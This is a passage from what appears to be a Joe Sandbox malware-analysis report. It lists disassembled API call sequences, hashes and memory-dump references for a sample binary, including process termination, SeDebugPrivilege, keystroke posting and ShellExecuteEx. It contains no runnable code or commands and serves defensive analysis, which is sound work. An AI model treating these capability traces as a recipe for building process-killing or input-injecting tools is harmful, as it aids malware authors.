• API ID: MessageSend$Window_wcscat
• String ID: SysListView32
• API String ID: 307300125-78025650
APIs
  • Part of subcall function 00383C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00383C7A
  • Part of subcall function 00383C55: Process32FirstW.KERNEL32(00000000,?), ref: 00383C88
  • Part of subcall function 00383C55: CloseHandle.KERNEL32(00000000), ref: 00383D52
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0039E9A4
• GetLastError.KERNEL32 ref: 0039E9B7
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0039E9E6
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0039EA63
• GetLastError.KERNEL32(00000000), ref: 0039EA6E
• CloseHandle.KERNEL32(00000000), ref: 0039EAA3
Strings
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 00383033
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconLoad
                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                    • API String ID: 2457776203-404129466
                                                                                                                    • Opcode ID: 112b3476e8af870f878a28ea5ef3b3fe5dfd84e6a21da0f5a13266199b5e159b
                                                                                                                    • Instruction ID: bffd75d0de18f94b35ddabdc5c716c4b3105cea123b06bbf7688a79c222abeda
                                                                                                                    • Opcode Fuzzy Hash: 112b3476e8af870f878a28ea5ef3b3fe5dfd84e6a21da0f5a13266199b5e159b
                                                                                                                    • Instruction Fuzzy Hash: CD112B72348346BED717AB54EC42CAB779C9F16760F1000AAF901BA381DB71BF4057A5
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00384312
                                                                                                                    • LoadStringW.USER32(00000000), ref: 00384319
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0038432F
                                                                                                                    • LoadStringW.USER32(00000000), ref: 00384336
                                                                                                                    • _wprintf.LIBCMT ref: 0038435C
                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0038437A
                                                                                                                    Strings
                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00384357
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                    • API String ID: 3648134473-3128320259
                                                                                                                    • Opcode ID: c7aaab879c7ca8cde70291bcde899c813ebec278b7f6dd0f6025b0b0a4206721
                                                                                                                    • Instruction ID: f09203ed36b2a2fb478cb35b53ab4fbfd2c418e314a17f6be795983fe01ba12b
                                                                                                                    • Opcode Fuzzy Hash: c7aaab879c7ca8cde70291bcde899c813ebec278b7f6dd0f6025b0b0a4206721
                                                                                                                    • Instruction Fuzzy Hash: F30186F7940208BFE752ABE0DD89EF7776CDB09300F0005A5B745E6051EA745E854B74
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00322612: GetWindowLongW.USER32(?,000000EB), ref: 00322623
                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 003AD47C
                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 003AD49C
                                                                                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 003AD6D7
                                                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003AD6F5
                                                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003AD716
                                                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 003AD735
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 003AD75A
                                                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 003AD77D
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1211466189-0
                                                                                                                    • Opcode ID: 5f96f10c3f69d8e916b82559992f99ac2e989453fc4ba028923c11dffff09d18
                                                                                                                    • Instruction ID: 614a52340f50ccd6accd8d6c18a0107828064742e2d32938f29dbb562c3e6154
                                                                                                                    • Opcode Fuzzy Hash: 5f96f10c3f69d8e916b82559992f99ac2e989453fc4ba028923c11dffff09d18
                                                                                                                    • Instruction Fuzzy Hash: E0B1AB70600215AFDF1ACF68C9897AD7BB1FF06700F098169EC4A9EAA5D735A950CB90
                                                                                                                    APIs
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0035C1C7,00000004,00000000,00000000,00000000), ref: 00322ACF
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0035C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00322B17
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0035C1C7,00000004,00000000,00000000,00000000), ref: 0035C21A
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0035C1C7,00000004,00000000,00000000,00000000), ref: 0035C286
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ShowWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1268545403-0
                                                                                                                    • Opcode ID: fff122a085caf8f38a4dc04df2ff59d803597f88f71b7aec44710b7d8c5a4259
                                                                                                                    • Instruction ID: c3411fee24351003a274f9aa71d2a0bdf9e4e8e1f0d135f675bddfe64972e2f6
                                                                                                                    • Opcode Fuzzy Hash: fff122a085caf8f38a4dc04df2ff59d803597f88f71b7aec44710b7d8c5a4259
                                                                                                                    • Instruction Fuzzy Hash: 13412A31618790BECB379B68EC88B6B7BDAAB46304F15882DE44786D70CE719885D750
                                                                                                                    APIs
                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 003870DD
                                                                                                                      • Part of subcall function 00340DB6: std::exception::exception.LIBCMT ref: 00340DEC
                                                                                                                      • Part of subcall function 00340DB6: __CxxThrowException@8.LIBCMT ref: 00340E01
                                                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00387114
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00387130
                                                                                                                    • _memmove.LIBCMT ref: 0038717E
                                                                                                                    • _memmove.LIBCMT ref: 0038719B
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 003871AA
                                                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003871BF
                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 003871DE
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 256516436-0
                                                                                                                    • Opcode ID: 0c3d7e4167985af59c413a63a45b6dae623d2003996a7d5f86ceb20e6c26c6e0
                                                                                                                    • Instruction ID: 3ed7f8b3fce1c255cbf7e7d4e0923fca43ae0650e2753f8b732e1aec56ac9f87
                                                                                                                    • Opcode Fuzzy Hash: 0c3d7e4167985af59c413a63a45b6dae623d2003996a7d5f86ceb20e6c26c6e0
                                                                                                                    • Instruction Fuzzy Hash: 59317035A00205EFCB12EFA5DC85AAEB7B9EF45710F1441B5E904AF256DB30EE54CB60
                                                                                                                    APIs
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 003A61EB
                                                                                                                    • GetDC.USER32(00000000), ref: 003A61F3
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003A61FE
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 003A620A
                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 003A6246
                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003A6257
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,003A902A,?,?,000000FF,00000000,?,000000FF,?), ref: 003A6291
                                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003A62B1
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3864802216-0
                                                                                                                    • Opcode ID: 95b2a93d225c34948361fd3064e381b332ed9a1613195f62e738b55ee3fa3274
                                                                                                                    • Instruction ID: 93d6da799e0bacc50a7107e07a44e6f11df088d47fc381c1c8cca08ec61f17d5
                                                                                                                    • Opcode Fuzzy Hash: 95b2a93d225c34948361fd3064e381b332ed9a1613195f62e738b55ee3fa3274
                                                                                                                    • Instruction Fuzzy Hash: 79314F72101214BFEB128F50CC8AFEB3BADEF4A765F094065FE089A1A2C6759C41CB64
                                                                                                                    APIs
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2931989736-0
                                                                                                                    • Opcode ID: 5f49d5d331370da01abfe4c50c6424257a8e18fb1c1522eff3a87d4eb95a67b4
                                                                                                                    • Instruction ID: 9413ff529a1a36b0b28eb9d975980be66287bb1f36c74beae79d9e5cc6aa8baf
                                                                                                                    • Opcode Fuzzy Hash: 5f49d5d331370da01abfe4c50c6424257a8e18fb1c1522eff3a87d4eb95a67b4
                                                                                                                    • Instruction Fuzzy Hash: 1421AA616016067BE6276611DD42FFBF77D9E1038CF05C114FE085EA47EB58EE1581A1
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00329837: __itow.LIBCMT ref: 00329862
                                                                                                                      • Part of subcall function 00329837: __swprintf.LIBCMT ref: 003298AC
                                                                                                                      • Part of subcall function 0033FC86: _wcscpy.LIBCMT ref: 0033FCA9
                                                                                                                    • _wcstok.LIBCMT ref: 0038EC94
                                                                                                                    • _wcscpy.LIBCMT ref: 0038ED23
                                                                                                                    • _memset.LIBCMT ref: 0038ED56
                                                                                                                    Strings
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                    • String ID: X
                                                                                                                    • API String ID: 774024439-3081909835
                                                                                                                    • Opcode ID: ab0449e1b09e4dc09ac40bc1aa3335bbbd06da0489db5a6f83099a2581a9459d
                                                                                                                    • Instruction ID: 53a56af3920c48c8e01dc1ae64f7d91a13c2c031af42ee3fe15a6303d78ff2ab
                                                                                                                    • Opcode Fuzzy Hash: ab0449e1b09e4dc09ac40bc1aa3335bbbd06da0489db5a6f83099a2581a9459d
                                                                                                                    • Instruction Fuzzy Hash: 32C19D356087109FC726EF24D881A6AB7E4FF85310F01496DF8999B2A2DB70ED45CB82
                                                                                                                    APIs
                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00396C00
                                                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00396C21
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00396C34
                                                                                                                    • htons.WSOCK32(?,?,?,00000000,?), ref: 00396CEA
                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 00396CA7
                                                                                                                      • Part of subcall function 0037A7E9: _strlen.LIBCMT ref: 0037A7F3
                                                                                                                      • Part of subcall function 0037A7E9: _memmove.LIBCMT ref: 0037A815
                                                                                                                    • _strlen.LIBCMT ref: 00396D44
                                                                                                                    • _memmove.LIBCMT ref: 00396DAD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3619996494-0
                                                                                                                    • Opcode ID: aad7131a4baa2823526763b4cf53126132df4e268156e693ca9f2a5766593c58
                                                                                                                    • Instruction ID: 160366e41ef16afa6c5735e6b319778652fee57b8cb67de0cc1c8e779772248e
                                                                                                                    • Opcode Fuzzy Hash: aad7131a4baa2823526763b4cf53126132df4e268156e693ca9f2a5766593c58
                                                                                                                    • Instruction Fuzzy Hash: AC81CD72204310AFDB12EF24DC82F6AB7A8AF85714F50491DF9569F292DB70ED44CB92
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: edd360c8f4d14e1702bab510cda9e6d37bb3e64ff045138b7cd3db7a934d61b6
                                                                                                                    • Instruction ID: 11c7399bfd0e06973f07822b4e7a0354346104b508e39d3825b33fb5cff52645
                                                                                                                    • Opcode Fuzzy Hash: edd360c8f4d14e1702bab510cda9e6d37bb3e64ff045138b7cd3db7a934d61b6
                                                                                                                    • Instruction Fuzzy Hash: 6E719B30900119EFCB06DF99DD49EBFBB79FF8A310F218159F915AA251C734AA11CBA0
                                                                                                                    APIs
                                                                                                                    • IsWindow.USER32(011B58C8), ref: 003AB3EB
                                                                                                                    • IsWindowEnabled.USER32(011B58C8), ref: 003AB3F7
                                                                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 003AB4DB
                                                                                                                    • SendMessageW.USER32(011B58C8,000000B0,?,?), ref: 003AB512
                                                                                                                    • IsDlgButtonChecked.USER32(?,?), ref: 003AB54F
                                                                                                                    • GetWindowLongW.USER32(011B58C8,000000EC), ref: 003AB571
                                                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 003AB589
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4072528602-0
                                                                                                                    • Opcode ID: cb11adfeb683e3a6626300fea934c5cd165ad9f0caa45cc7ea5e8acfae51753e
                                                                                                                    • Instruction ID: 8bccf64f274eabf4c9284e97b5c9a8696adf1c7a42b2ad03682c8380463a86f0
                                                                                                                    • Opcode Fuzzy Hash: cb11adfeb683e3a6626300fea934c5cd165ad9f0caa45cc7ea5e8acfae51753e
                                                                                                                    • Instruction Fuzzy Hash: 20718C38604204EFEF269F66C894FBABBB9EF0B300F154159E945972A3C732A950DB50
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 0039F448
                                                                                                                    • _memset.LIBCMT ref: 0039F511
                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 0039F556
                                                                                                                      • Part of subcall function 00329837: __itow.LIBCMT ref: 00329862
                                                                                                                      • Part of subcall function 00329837: __swprintf.LIBCMT ref: 003298AC
                                                                                                                      • Part of subcall function 0033FC86: _wcscpy.LIBCMT ref: 0033FCA9
                                                                                                                    • GetProcessId.KERNEL32(00000000), ref: 0039F5CD
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0039F5FC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 3522835683-2766056989
                                                                                                                    • Opcode ID: dbb66761a0e016014cc743180f67d9f7281254cab05d0dd3731175eeb3cae404
                                                                                                                    • Instruction ID: 709bb0f99e5c88b553e91bdd8d83c3046da9a5d546bb9927310df42c46ba7471
                                                                                                                    • Opcode Fuzzy Hash: dbb66761a0e016014cc743180f67d9f7281254cab05d0dd3731175eeb3cae404
                                                                                                                    • Instruction Fuzzy Hash: 4061BE75A006299FCF16DFA4C481AAEBBF4FF49310F15806AE819AB351CB30AD41CB80
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(?), ref: 00380F8C
                                                                                                                    • GetKeyboardState.USER32(?), ref: 00380FA1
                                                                                                                    • SetKeyboardState.USER32(?), ref: 00381002
                                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00381030
                                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 0038104F
                                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00381095
                                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 003810B8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 87235514-0
                                                                                                                    • Opcode ID: 638727265d4c7600b78f27661c8c97bf2132cc988801e31dfbffa6e12abed50d
                                                                                                                    • Instruction ID: fa9e050576de5ddcb458c6ad900b000e66d48e09dd790c6e4c672028b73edc28
                                                                                                                    • Opcode Fuzzy Hash: 638727265d4c7600b78f27661c8c97bf2132cc988801e31dfbffa6e12abed50d
                                                                                                                    • Instruction Fuzzy Hash: 2B51D3A05047D53DFB3762348C05BB6BFAD5B06304F0989C9E2D8898D3C299DCCAD751
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(00000000), ref: 00380DA5
                                                                                                                    • GetKeyboardState.USER32(?), ref: 00380DBA
                                                                                                                    • SetKeyboardState.USER32(?), ref: 00380E1B
                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00380E47
                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00380E64
                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00380EA8
                                                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00380EC9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 87235514-0
                                                                                                                    • Opcode ID: 9223202703bc8045a34bec50dfec8955bf153dc60242d0b7600e5e4bd5dad9a7
                                                                                                                    • Instruction ID: 478ea129b3c8d214ab95b198076ee104eacab8c546f10f91384f0f00925fed1d
                                                                                                                    • Opcode Fuzzy Hash: 9223202703bc8045a34bec50dfec8955bf153dc60242d0b7600e5e4bd5dad9a7
                                                                                                                    • Instruction Fuzzy Hash: E751F4A0504BD53EFB7BA7748C45B7BBEA96B06300F0988C9E1D49A8C2C395BC9DD750
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsncpy$LocalTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2945705084-0
                                                                                                                    • Opcode ID: e819cb570162d4afa7e803b989f270cd5583e41f1b77b3a36d65cccd1ab1327f
                                                                                                                    • Instruction ID: 339a5c81671494e67e2d4c70785ddcd9a33cafa8c3bea7395fde87a25b6e80c8
                                                                                                                    • Opcode Fuzzy Hash: e819cb570162d4afa7e803b989f270cd5583e41f1b77b3a36d65cccd1ab1327f
                                                                                                                    • Instruction Fuzzy Hash: 7E417165C1061876CB13EBF48846ACFB3F8DF05310F5189A6F518EB221FA34A755C7A6
                                                                                                                    APIs
                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0037D5D4
                                                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0037D60A
                                                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0037D61B
                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0037D69D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                    • String ID: ,,;$DllGetClassObject
                                                                                                                    • API String ID: 753597075-1747262133
                                                                                                                    • Opcode ID: 64bf9c2207aea4280125c9f6ea79b46be30d047602a585339971e93e93bb97a8
                                                                                                                    • Instruction ID: 468f8eb69190b804dcceaff4ab20f29ee5fe6a83ad97424d08a8c44cfdf771fe
                                                                                                                    • Opcode Fuzzy Hash: 64bf9c2207aea4280125c9f6ea79b46be30d047602a585339971e93e93bb97a8
                                                                                                                    • Instruction Fuzzy Hash: D8417EB1600204EFDB26DF64C884A9ABBB9EF44314F55C1ADED0D9F205D7B9D944CBA0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0038466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00383697,?), ref: 0038468B
                                                                                                                      • Part of subcall function 0038466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00383697,?), ref: 003846A4
                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 003836B7
                                                                                                                    • _wcscmp.LIBCMT ref: 003836D3
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 003836EB
                                                                                                                    • _wcscat.LIBCMT ref: 00383733
                                                                                                                    • SHFileOperationW.SHELL32(?), ref: 0038379F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
